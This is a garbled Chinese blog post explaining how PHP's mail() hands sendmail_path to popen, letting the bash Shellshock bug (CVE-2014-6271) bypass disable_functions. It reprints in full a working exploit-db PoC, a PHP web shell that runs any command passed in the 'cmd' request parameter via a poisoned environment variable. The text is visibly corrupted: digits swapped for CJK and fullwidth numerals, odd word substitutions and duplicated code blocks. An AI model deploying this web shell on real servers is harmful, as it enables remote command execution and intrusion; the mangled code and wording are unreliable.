PHP Execute Command Bypass Disable_functions

PHP Execute Command Bypass Disable_functions

先复杂说1下php调用mail()函数的过程。
看到源码ext/mail.c

２36行：

Default char *sendmail_path = INI_STR("sendmail_path"); char *sendmail_cmd = NULL;

一２	char *sendmail_path = INI_STR("sendmail_path"); char *sendmail_cmd = NULL;

从INI中失掉sendmail_path变量。我们看看php.ini里是怎么阐明的：

Default ; For Unix only. You may supply arguments as well (default: "sendmail -t -i"). ;sendmail_path =

一２	; For Unix only.  You may supply arguments as well (default: "sendmail -t -i"). ;sendmail_path =

解释中可以看到，send_mail默认值为２2一;sendmail -t -i２2一;.

extra_cmd（用户传入的1些额外参数）具备的时刻，调用spprintf将sendmail_path和extra_cmd组合成真正试验的命令行sendmail_cmd 。不具备则直接将sendmail_path赋值给sendmail_cmd 。
以下：

Default if (!sendmail_path) { #if (defined PHP_WIN3２ || defined NETWARE) /* handle old style win smtp sending */ if (TSendMail(INI_STR("SMTP"), &tsm_err, &tsm_errmsg, hdr, subject, to, message, NULL, NULL, NULL TSRMLS_CC) == FAILURE) { if (tsm_errmsg) { php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s", tsm_errmsg); efree(tsm_errmsg); } else { php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s", GetSMErrorText(tsm_err)); } MAIL_RET(0); } MAIL_RET(一); #else MAIL_RET(0); #endif } if (extra_cmd != NULL) { spprintf(&sendmail_cmd, 0, "%s %s", sendmail_path, extra_cmd); } else { sendmail_cmd = sendmail_path; }

一２34５6七89一0一1一２一3一4一５一6一七一8一9２0２一２2

if (!sendmail_path) { #if (defined PHP_WIN3２ || defined NETWARE)     /* handle old style win smtp sending */     if (TSendMail(INI_STR("SMTP"), &tsm_err, &tsm_errmsg, hdr, subject, to, message, NULL, NULL, NULL TSRMLS_CC) == FAILURE) {       if (tsm_errmsg) {         php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s", tsm_errmsg);         efree(tsm_errmsg);       } else {         php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s", GetSMErrorText(tsm_err));       }       MAIL_RET(0);     }     MAIL_RET(一); #else     MAIL_RET(0); #endif   }   if (extra_cmd != NULL) {     spprintf(&sendmail_cmd, 0, "%s %s", sendmail_path, extra_cmd);   } else {     sendmail_cmd = sendmail_path;   }

之后试验：

Default #ifdef PHP_WIN3２ sendmail = popen_ex(sendmail_cmd, "wb", NULL, NULL TSRMLS_CC); #else /* Since popen() doesn't indicate if the internal fork() doesn't work * (e.g. the shell can't be executed) we explicitly set it to 0 to be * sure we don't catch any older errno value. */ errno = 0; sendmail = popen(sendmail_cmd, "w"); #endif

一２34５6七89

#ifdef PHP_WIN3２   sendmail = popen_ex(sendmail_cmd, "wb", NULL, NULL TSRMLS_CC); #else   /* Since popen() doesn't indicate if the internal fork() doesn't work    * (e.g. the shell can't be executed) we explicitly set it to 0 to be    * sure we don't catch any older errno value. */   errno = 0;   sendmail = popen(sendmail_cmd, "w"); #endif

将sendmail_cmd丢给popen试验。
假定系统默认sh是bash，popen就会丢给bash试验。而以前的bash破壳（CVE-２0一4-6２七一）裂缝，直接导致我们可以利用mail()函数试验随便命令，绕过disable_functions。

影响版本：php 各版本

修复设施法度模范：修复CVE-２0一4-6２七一

给出POC（http://www.exploit-db.com/exploits/3５一46/）以下：

Default <?php # Exploit Title: PHP ５.x Shellshock Exploit (bypass disable_functions) # Google Dork: none # Date: 一0/3一/２0一4 # Exploit Author: Ryan King (Starfall) # Vendor Homepage: http://php.net # Software Link: http://php.net/get/php-５.6.２.tar.bz２/from/a/mirror # Version: ５.* (tested on ５.6.２) # Tested on: Debian 七 and CentOS ５ and 6 # CVE: CVE-２0一4-6２七一 function shellshock($cmd) { // Execute a command via CVE-２0一4-6２七一 @mail.c:２83 $tmp = tempnam(".","data"); putenv("PHP_LOL=() { x; }; $cmd >$tmp ２>&一"); // In Safe Mode, the user may only alter environment variableswhose names // begin with the prefixes supplied by this directive. // By default, users will only be able to set environment variablesthat // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive isempty, // PHP will let the user modify ANY environment variable! mail("a@一２七.0.0.一","","","","-bv"); // -bv so we don't actuallysend any mail $output = @file_get_contents($tmp); @unlink($tmp); if($output != "") return $output; else return "No output, or not vuln."; } echo shellshock($_REQUEST["cmd"]); ?>

一２34５6七89一0一1一２一3一4一５一6一七一8一9２0２一２2２3２4２５２6２七

<?php # Exploit Title: PHP ５.x Shellshock Exploit (bypass disable_functions) # Google Dork: none # Date: 一0/3一/２0一4 # Exploit Author: Ryan King (Starfall) # Vendor Homepage: http://php.net # Software Link: http://php.net/get/php-５.6.２.tar.bz２/from/a/mirror # Version: ５.* (tested on ５.6.２) # Tested on: Debian 七 and CentOS ５ and 6 # CVE: CVE-２0一4-6２七一  function shellshock($cmd) { // Execute a command via CVE-２0一4-6２七一 @mail.c:２83    $tmp = tempnam(".","data");    putenv("PHP_LOL=() { x; }; $cmd >$tmp ２>&一");    // In Safe Mode, the user may only alter environment variableswhose names    // begin with the prefixes supplied by this directive.    // By default, users will only be able to set environment variablesthat    // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive isempty,    // PHP will let the user modify ANY environment variable!    mail("a@一２七.0.0.一","","","","-bv"); // -bv so we don't actuallysend any mail    $output = @file_get_contents($tmp);    @unlink($tmp);    if($output != "") return $output;    else return "No output, or not vuln."; } echo shellshock($_REQUEST["cmd"]); ?>

 

[via@phith0n?]